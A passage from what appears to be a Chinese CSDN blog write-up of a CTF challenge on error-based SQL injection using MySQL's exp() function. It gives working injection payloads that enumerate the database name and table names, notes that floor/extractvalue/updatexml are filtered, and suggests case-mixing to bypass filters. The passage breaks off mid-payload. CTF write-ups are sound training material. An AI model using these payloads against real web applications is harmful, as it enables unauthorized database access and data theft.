实验吧Web-易-简单的sql注入之3(报错的sql盲注之exp)

本文介绍了如何在实验吧Web-易题目中利用报错SQL盲注技巧获取信息。通过发现exp可以绕过过滤,成功进行注入。步骤包括爆库、爆表、爆列名直至获取到flag内容。参考链接提供了更多细节。
摘要由CSDN通过智能技术生成

题目提示是报错注入,于是就用盲注技巧来注入。

这里注入时发现floor,extractvalue,updatexml被吃掉了,用exp可以注入成功。(记住大小写绕过等技巧)

1.爆库

' or exp(~(select * from(select database())a))#
这里最后面的a处可为别的字母,且必须要有

可以看到库名为web1。

2,爆表

' or exp(~(select * from(select group_concat(table_name) from information_schema.tables where table_schema=database())a))#
或者
' or exp(~(select * from(select group_concat(table_name) from information_schema.tables where table_schema='web1')a))#

 flag应该在表flag中。

3.爆列名

' or exp(~(select * from(select group_concat(column_name) from information_schema.columns wh
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值